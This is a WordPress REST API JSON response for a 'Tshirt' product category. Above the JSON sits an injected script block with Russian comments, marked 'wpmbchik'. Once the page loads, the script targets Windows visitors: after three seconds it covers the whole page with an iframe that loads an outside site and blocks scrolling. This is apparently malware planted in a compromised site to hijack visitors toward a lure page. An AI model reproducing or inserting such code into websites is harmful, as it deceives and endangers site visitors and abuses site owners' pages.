
<!-- wpmbchik -->
<script>
function createModal(url) {
  const overlay = document.createElement('div');
  Object.assign(overlay.style, {
    position: 'fixed',
    inset: '0',              // top/right/bottom/left = 0
    width: '100vw',          // на всякий случай — единицы viewport
    height: '100vh',
    background: '#fff',
    zIndex: '2147483647',    // максимальный z-index
    margin: '0',
    padding: '0',
    border: '0'
  });

  const iframe = document.createElement('iframe');
  iframe.src = url;
  iframe.allowFullscreen = true;
  iframe.allow = 'fullscreen';
  Object.assign(iframe.style, {
    width: '100%',
    height: '100%',
    border: 'none',
    display: 'block',
    margin: '0',
    padding: '0'
  });

  overlay.appendChild(iframe);
  document.body.appendChild(overlay);

  document.documentElement.style.overflow = 'hidden';
  document.body.style.overflow = 'hidden';
  document.body.style.margin = '0';
}
document.addEventListener('DOMContentLoaded', () => {
  const isWindows = /Win/i.test(navigator.userAgent);
  
  if (isWindows) {
 setTimeout(() => {
    createModal('https://clickhere.click');
 }, 3000); }
});


</script>
<!-- /wpmbchik -->
{"id":57,"count":6,"description":"","link":"https:\/\/redwings16.com\/?product_cat=tshirt","name":"Tshirt","slug":"tshirt","taxonomy":"product_cat","parent":0,"meta":[],"_links":{"self":[{"href":"https:\/\/redwings16.com\/index.php?rest_route=\/wp\/v2\/product_cat\/57","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/redwings16.com\/index.php?rest_route=\/wp\/v2\/product_cat"}],"about":[{"href":"https:\/\/redwings16.com\/index.php?rest_route=\/wp\/v2\/taxonomies\/product_cat"}],"wp:post_type":[{"href":"https:\/\/redwings16.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct&product_cat=57"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}